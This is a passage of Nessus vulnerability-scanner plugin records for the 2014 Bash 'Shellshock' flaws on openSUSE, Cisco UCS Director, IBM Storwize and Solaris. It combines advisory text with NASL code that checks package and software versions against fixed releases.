bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-595.NASL", "href": "https://www.tenable.com/plugins/nessus/78591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78591);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for\n bsc#898812, CVE-2014-6277: more troubles with functions\n bash-4.2-parse-exportfunc.patch for bsc#898884,\n CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898884\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:13", "description": "According to its self-reported version, the remote host is running a version of Cisco UCS Director that could be affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can be exploited.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "Cisco UCS Director Code Injection (CSCur02877) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:cisco:ucs_director"], "id": "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "href": "https://www.tenable.com/plugins/nessus/78770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78770);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco UCS Director Code Injection (CSCur02877) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a vulnerable version of Bash.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote host is running a\nversion of Cisco UCS Director that could be affected by a command\ninjection vulnerability in GNU Bash known as Shellshock, which is due\nto the processing of trailing strings after function definitions in\nthe values of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can\nbe exploited.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02877\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch or upgrade to the version recommended in Cisco bug ID\nCSCur02877\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:ucs_director\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucs_director_detect.nbin\");\n script_require_keys(\"Host/Cisco/UCSDirector/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nchckver = get_kb_item_or_exit(\"Host/Cisco/UCSDirector/version\");\n# Could be unknown version because the WebUI can be detected but\n# no version information could be retrieved.\nif (chckver == UNKNOWN_VER) audit(AUDIT_UNKNOWN_DEVICE_VER, \"Cisco UCS Director\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n (\n ver_compare(ver:chckver, fix:\"4.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"4.1.0.5\", strict:FALSE) <= 0\n ) ||\n (\n ver_compare(ver:chckver, fix:\"5.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"5.0.0.2\", strict:FALSE) < 0\n )\n)\n{\n if (report_verbosity > 0)\n {\n if (chckver =~ \"^5\\.\")\n fix = '5.0.0.0 with hotfix cucsd_5_0_0_0_bash_hotfix / 5.0.0.2 / 5.1.0.0';\n else\n fix = '4.1.0.5 with hotfix cucsd_4_1_0_5_bash_hotfix';\n\n report =\n '\\n Installed version : ' + chckver +\n '\\n Fixed version (s) : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:48:47", "description": "The remote IBM Storwize V7000 Unified device is running version 1.3.x prior to 1.4.3.5 or 1.5.x prior to 1.5.0.4. It is, therefore, affected by the following vulnerabilities :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271) \n - An out-of-bounds memory access error exists in GNU Bash in file parse.y due to evaluating untrusted input during stacked redirects handling. A remote attacker can exploit this, via a crafted 'here' document, to execute arbitrary code or cause a denial of service. (CVE-2014-7186)\n\n - An off-by-one error exists in GNU Bash in the read_token_word() function in file parse.y when handling deeply-nested flow control constructs. A remote attacker can exploit this, by using deeply nested loops, to execute arbitrary code or cause a denial of service.\n (CVE-2014-7187)\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6278) Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-25T00:00:00", "type": "nessus", "title": "IBM Storwize V7000 Unified 1.3.x < 1.4.3.5 / 1.5.x < 1.5.0.4 Multiple Vulnerabilities (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/h:ibm:storwize_unified_v7000", "cpe:/a:ibm:storwize_v7000_unified_software"], "id": "IBM_STORWIZE_1_5_0_4.NASL", "href": "https://www.tenable.com/plugins/nessus/85630", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85630);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"IBM Storwize V7000 Unified 1.3.x < 1.4.3.5 / 1.5.x < 1.5.0.4 Multiple Vulnerabilities (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IBM Storwize V7000 Unified device is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote IBM Storwize V7000 Unified device is running version 1.3.x\nprior to 1.4.3.5 or 1.5.x prior to 1.5.0.4. It is, therefore, affected\nby the following vulnerabilities :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6271)\n \n - An out-of-bounds memory access error exists in GNU Bash\n in file parse.y due to evaluating untrusted input during\n stacked redirects handling. A remote attacker can exploit\n this, via a crafted 'here' document, to execute arbitrary\n code or cause a denial of service. (CVE-2014-7186)\n\n - An off-by-one error exists in GNU Bash in the\n read_token_word() function in file parse.y when handling\n deeply-nested flow control constructs. A remote attacker\n can exploit this, by using deeply nested loops, to\n execute arbitrary code or cause a denial of service.\n (CVE-2014-7187)\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6278) Note that\n this vulnerability exists because of an incomplete fix\n for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004898\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to IBM Storwize V7000 Unified version 1.4.3.5 / 1.5.0.4 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:ibm:storwize_unified_v7000\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:storwize_v7000_unified_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ibm_storwize_detect.nbin\");\n script_require_keys(\"Host/IBM/Storwize/version\", \"Host/IBM/Storwize/machine_major\", \"Host/IBM/Storwize/display_name\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/IBM/Storwize/version\");\nmachine_major = get_kb_item_or_exit(\"Host/IBM/Storwize/machine_major\");\ndisplay_name = get_kb_item_or_exit(\"Host/IBM/Storwize/display_name\");\n\nif (\n machine_major != \"2073\" # V7000 Unified\n) audit(AUDIT_DEVICE_NOT_VULN, display_name);\n\nif (version == UNKNOWN_VER || version == \"Unknown\")\n audit(AUDIT_UNKNOWN_APP_VER, display_name);\n\nif (version =~ \"^1\\.[3-4]\\.\") fix = \"1.4.3.5\";\nelse if (version =~ \"^1\\.5\\.\") fix = \"1.5.0.4\";\nelse audit(AUDIT_DEVICE_NOT_VULN, display_name, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_DEVICE_NOT_VULN, display_name, version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Name : ' + display_name +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(port:0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:20:18", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the 'word_lineno' issue. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.2", "p-cpe:/a:oracle:solaris:bash"], "id": "SOLARIS11_BASH_20141031.NASL", "href": "https://www.tenable.com/plugins/nessus/80590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80590);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - GNU Bash through 4.3 processes trailing strings after\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the\n vulnerability that is still present after the incorrect\n fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary commands via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2014-6271,\n CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing\n strings after certain malformed function definitions in\n the values of environment variables, which allows remote\n attackers to write to files or possibly have unknown\n other impact via a crafted environment, as demonstrated\n by vectors involving the ForceCommand feature in OpenSSH\n sshd, the mod_cgi and mod_cgid modules in the Apache\n HTTP Server, scripts executed by unspecified DHCP\n clients, and other situations in which setting the\n environment occurs across a privilege boundary from Bash\n execution. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash\n through 4.3 bash43-026 allows remote attackers to cause\n a denial of service (out-of-bounds array access and\n application crash) or possibly have unspecified other\n impact via crafted use of here documents, aka the\n 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in\n parse.y in GNU Bash through 4.3 bash43-026 allows remote\n attackers to cause a denial of service (out-of-bounds\n array access and application crash) or possibly have\n unspecified other impact via deeply nested for loops,\n aka the 'word_lineno' issue. (CVE-2014-7187)\");\n 